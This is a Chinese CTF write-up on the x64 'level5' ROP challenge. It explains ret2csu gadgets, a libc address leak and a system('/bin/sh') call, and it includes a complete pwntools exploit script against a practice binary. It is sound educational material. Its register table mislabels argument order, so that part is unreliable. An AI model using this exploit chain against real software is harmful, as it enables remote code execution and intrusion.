emm第一篇自己写的详解 题目跟这儿下载
参考文章 一步一步学ROP之linux_x64篇 五
写的大概是傻瓜教程了吧,因为自己就是傻瓜
checksec
ida打开文件,f5反编译,双击main函数,观察,发现啥也没有,只有可怜的vulnerable_function函数。
分析一下,为了getshell我们要想办法输入命令system(“\bin\sh”),可以把这些命令写到bss段,然后想办法运行命令。
首先需要知道
-偏移 offset=function1真实地址-function1libc在库地址=function2真实地址-function2在libc库地址
-通过查找函数真实地址后三位可以查到所用的libc库和其他函数在库中地址
-而函数真实地址只有在被调用后才会得到
目前可用信息有自带的write函数和read函数,可以将信息写入外存和读入内存。调用函数需要知道函数真实地址,这就需要write函数将某个函数(我用了write函数)真实地址写入外存,然后查libc库得到其他函数libc库中的地址。
在x64下有一些万能的gadgets可以利用,比如_libc_csu_init()这个函数。一般来说,只要程序调用了libc.so,程序都会有这个函数用来对libc进行初始化操作。
右键,选择copy to assembly,然后按空格噻,得到一些整整齐齐的段名称和地址,查看_libc_csu_init()。
利用0x400606处的代码我们可以控制rbx,rbp,r12,r13,r14和r15的值,利用0x4005f0处的代码将r15的值赋值给rdx, r14的值赋值给rsi,r13的值赋值给edi,随后就会调用call qword ptr [r12+rbx*8],这时候将rbx赋值0,可以将想调用的函数地址传给r12。执行完函数之后,程序会对rbx+=1,然后对比rbp和rbx的值,如果相等就会继续向下执行并ret到我们想要继续执行的地址。所以为了让rbp和rbx的值相等,我们可以将rbp的值设置为1。
rbx 0
rbp 1
r12 想调用的函数地址
r13 ->edi 函数第三个参数
r14 ->rsi 函数第二个参数
r15 ->rdx 函数第一个参数
payload1,利用write()输出write在内存中的地址。gadget是call qword ptr [r12+rbx*8],所以应该使用write.got的地址而不是write.plt的地址。并且为了返回到原程序中,重复利用buffer overflow的漏洞,我们需要继续覆盖栈上的数据,直到把返回值覆盖成目标函数的main函数为止。
这里要说一下第一个p64(0)是将栈占了8位空间,因为将鼠标挪到下图红圈位置,显示从0038到0030需要一些东西也就是pop_junk
exp在收到write()在内存中的地址
利用真实地址后三位查库libc库
可以计算出system()在内存中的地址
构造payload2,利用read()将system()的地址以及“/bin/sh”读入到.bss段内存中
最后构造payload3,调用system()函数执行“/bin/sh”。注意,system()的地址保存在了.bss段首地址上,“/bin/sh”的地址保存在了.bss段首地址+8字节上。
出题人说: 要注意的是,当我们把程序的io重定向到socket上的时候,根据网络协议,因为发送的数据包过大,read()有时会截断payload,造成payload传输不完整造成攻击失败。这时候要多试几次即可成功。如果进行远程攻击的话,需要保证ping值足够小才行(局域网)。
反正我就需要试几次才能getshell,反正自己搞出来代码贼开心。文章用的exp为了美观我就改了改原出题人给的exp。
最终exp:()
from pwn import *
elf = ELF('level5')
p = process('./level5')
write_got = elf.got['write']
print "write_got: " + hex(write_got)
read_got = elf.got['read']
print "read_got: " + hex(read_got)
main_addr = 0x400564
bss_addr = 0x601028
payload1 = "\x00"*136
payload1 += p64(0x400606) + p64(0) +p64(0) + p64(1) + p64(write_got) + p64(1) + p64(write_got) + p64(8)
# pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload1 += p64(0x4005F0)
payload1 += "a"*56
payload1 += p64(main_addr)
p.recvuntil("Hello, World\n")
print "\n#############sending payload1#############\n"
p.send(payload1)
sleep(1)
write_addr = u64(p.recv(8))
print "write_addr: " + hex(write_addr)
write_libc = 0x0f72b0
read_libc = 0x0f7250
system_libc = 0x045390
binsh_addr = 0x18cd57
offset = write_addr - write_libc
print "offset: " + hex(offset)
system_addr = offset + system_libc
print "system_addr: " + hex(system_addr)
p.recvuntil("Hello, World\n")
payload2 = "a"*136
payload2 += p64(0x400606) + p64(0) + p64(0) + p64(1) + p64(read_got) + p64(0) + p64(bss_addr) + p64(16)
# pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload2 += p64(0x4005F0)
payload2 += "a"*56
payload2 += p64(main_addr)
print "\n#############sending payload2#############\n"
p.send(payload2)
sleep(1)
p.send(p64(system_addr))
p.send("/bin/sh\00")
sleep(1)
p.recvuntil("Hello, World\n")
payload3 = "\x00"*136
payload3 += p64(0x400606) + p64(0) +p64(0) + p64(1) + p64(bss_addr) + p64(bss_addr+8) + p64(0) + p64(0)
# pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload3 += p64(0x4005F0)
payload3 += "\x00"*56
payload3 += p64(main_addr)
print "\n#############sending payload3#############\n"
sleep(1)
p.send(payload3)
p.interactive()
运行结果:
